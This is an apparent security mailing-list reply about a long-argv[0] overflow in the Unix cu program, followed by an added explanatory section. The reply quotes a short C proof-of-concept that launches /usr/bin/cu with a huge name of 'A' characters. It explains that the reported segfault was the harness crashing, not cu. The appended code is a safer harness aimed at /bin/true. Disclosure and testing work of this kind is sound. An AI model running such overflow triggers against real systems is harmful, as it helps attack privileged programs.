Dan Harkless <[EMAIL PROTECTED]> wrote:
>Are you implying the above patches fix the cu long hardlink name
>vulnerability? This is not the case, at least on 2.6:
>
> # cat > cu_exploit.c
> #include <stdio.h>
>
> void main(int argc,char **argv)
> {
> char *buf;
>
> buf = (char *) malloc(atoi(argv[1])*sizeof(char));
> memset(buf,0x41,atoi(argv[1])-1);
> buf[atoi(argv[1])-1]=0;
> execl("/usr/bin/cu",buf,(char *)0);
> }
> # gcc cu_exploit.c
> cu_exploit.c: In function `main':
> cu_exploit.c:4: warning: return type of `main' is not `int'
> # a.out
> Segmentation fault
See that atoi(argv[1])? a.out crashed, not /usr/bin/cu. Try "a.out 4000" or
whatever number next time, or trace through it with gdb.
-Optyx, Uberhax0r Communications
http://www.uberhax0r.net, leeter than dog
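The reply's point is that a crash in the harness (atoi(argv[1]) with argv[1] == NULL when no argument is given) is easy to mistake for a crash in the program being tested. The following is an added example, not code from either poster: it validates the length argument with strtol before using it, runs the child under fork/waitpid so the harness can tell whether the child exited, was killed by a signal, or never started, and targets the benign /bin/true (assumed to exist) rather than cu. The function names parse_len and run_with_long_argv0 are this example's own.

```c
/* Added example, not from the thread: a harness that checks its own
 * argument and reports whether the child or the harness itself failed.
 * Target is /bin/true (assumed present) so nothing is attacked. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Parse the length argument. Returns the length, or -1 when the argument
 * is missing or malformed. The quoted PoC instead calls atoi(argv[1])
 * unconditionally, which dereferences NULL when run with no argument;
 * that NULL dereference is the segfault seen in the thread. */
long parse_len(int argc, char **argv)
{
    if (argc < 2 || argv[1] == NULL)
        return -1;
    errno = 0;
    char *end = NULL;
    long n = strtol(argv[1], &end, 10);
    if (errno != 0 || end == argv[1] || *end != '\0' || n < 1 || n > 1000000)
        return -1;
    return n;
}

/* Run `path` in a child with an argv[0] made of (len - 1) 'A' bytes.
 * Returns 0 if the child exited with status 0, the signal number if the
 * child was killed by a signal, or -1 if the harness failed (allocation,
 * fork, exec, or a non-zero child exit). Checking the child's wait
 * status is what separates "the target crashed" from "my harness crashed". */
int run_with_long_argv0(const char *path, long len)
{
    char *buf = malloc((size_t)len);
    if (buf == NULL)
        return -1;
    memset(buf, 'A', (size_t)len - 1);
    buf[len - 1] = '\0';

    pid_t pid = fork();
    if (pid < 0) {
        free(buf);
        return -1;
    }
    if (pid == 0) {
        execl(path, buf, (char *)0);
        _exit(127); /* exec failed: surfaces as a harness error in the parent */
    }
    free(buf);

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (WIFSIGNALED(status))
        return WTERMSIG(status);
    if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
        return 0;
    return -1;
}

int main(int argc, char **argv)
{
    long len = parse_len(argc, argv);
    if (len < 0) {
        fprintf(stderr, "usage: %s <argv0-length>\n", argv[0]);
        return 2;
    }
    int rc = run_with_long_argv0("/bin/true", len);
    if (rc > 0)
        printf("child killed by signal %d\n", rc);
    else if (rc == 0)
        printf("child exited cleanly\n");
    else
        printf("harness error (child never ran or exited non-zero)\n");
    return rc == 0 ? 0 : 1;
}
```

Run with no argument and it prints the usage line instead of segfaulting; run as "./a.out 4000" and the harness reports on the child's fate rather than its own.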